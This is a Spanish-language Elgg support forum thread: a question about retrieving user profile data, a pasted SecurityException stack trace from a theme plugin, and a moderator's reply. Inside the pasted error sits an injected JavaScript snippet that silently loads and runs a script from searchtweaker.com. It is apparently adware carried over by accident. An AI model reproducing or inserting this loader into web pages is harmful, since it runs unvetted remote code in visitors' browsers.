Perfil de usuario

hola que tal, tengo un problema espero me puedan ayudar a resolverlo. Necesito exponer un método que me permita obtener los datos del perfil de un usuario registrado en Elgg, trabajo con la versión 1.7 y hasta el momento lo único que he logrado es obtener el avatar de cada usuario, pero no la información. Espero me puedan ayudar, se los agradesco mucho.

• hola  quiero sabe si  me pueden colaborar tengo un error fatal con un tema

Error Fatal

Redirect could not be issued due to headers already being sent. Halting execution for security. Search http://docs.elgg.org/ for more information.

SecurityException Object
    (
    [message:protected] => Redirect could not be issued due to headers already being sent. Halting execution for security. Search http://docs.elgg.org/ for more information.
    [string:Exception:private] => exception 'SecurityException' with message 'Redirect could not be issued due to headers already being sent. Halting execution for security. Search http://docs.elgg.org/ for more information.' in /home/hgggylre/public_html/comunidad/social/engine/lib/elgglib.php:150
    Stack trace:
    #0 /home/hgggylre/public_html/comunidad/social/mod/facebook_theme/start.php(372): forward('/dashboard')
    #1 [internal function]: facebook_theme_index_handler('index', 'system', true, NULL)
    #2 /home/hgggylre/public_html/comunidad/social/engine/lib/elgglib.php(980): call_user_func_array('facebook_theme_...', Array)
    #3 /home/hgggylre/public_html/comunidad/social/index.php(17): elgg_trigger_plugin_hook('index', 'system', NULL, false)
    #4 {main}
    [code:protected] => 0
    [file:protected] => /home/hgggylre/public_html/comunidad/social/engine/lib/elgglib.php
    [line:protected] => 150
    [trace:Exception:private] => Array
    (
    [0] => Array
    (
    [file] => /home/hgggylre/public_html/comunidad/social/mod/facebook_theme/start.php
    [line] => 372
    [function] => forward
    [args] => Array
    (
    [0] => /dashboard
    )

)

[1] => Array
    (
    [function] => facebook_theme_index_handler
    [args] => Array
    (
    [0] => index
    [1] => system
    [2] => 1
    [3] =>
    )

)

[2] => Array
    (
    [file] => /home/hgggylre/public_html/comunidad/social/engine/lib/elgglib.php
    [line] => 980
    [function] => call_user_func_array
    [args] => Array
    (
    [0] => facebook_theme_index_handler
    [1] => Array
    (
    [0] => index
    [1] => system
    [2] => 1
    [3] =>
    )

)

)

[3] => Array
    (
    [file] => /home/hgggylre/public_html/comunidad/social/index.php
    [line] => 17
    [function] => elgg_trigger_plugin_hook
    [args] => Array
    (
    [0] => index
    [1] => system
    [2] =>
    [3] =>
    )

)

)

[previous:Exception:private] =>

// <![CDATA[
    (function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
    // ]]>

• Que tema estas usando?

Rodolfo Hernandez

Arvixe/Elgg Community Liaison

Spanish Community Group

Spanish Community Group

Spanish support group. Grupo de apoyo de usuarios en español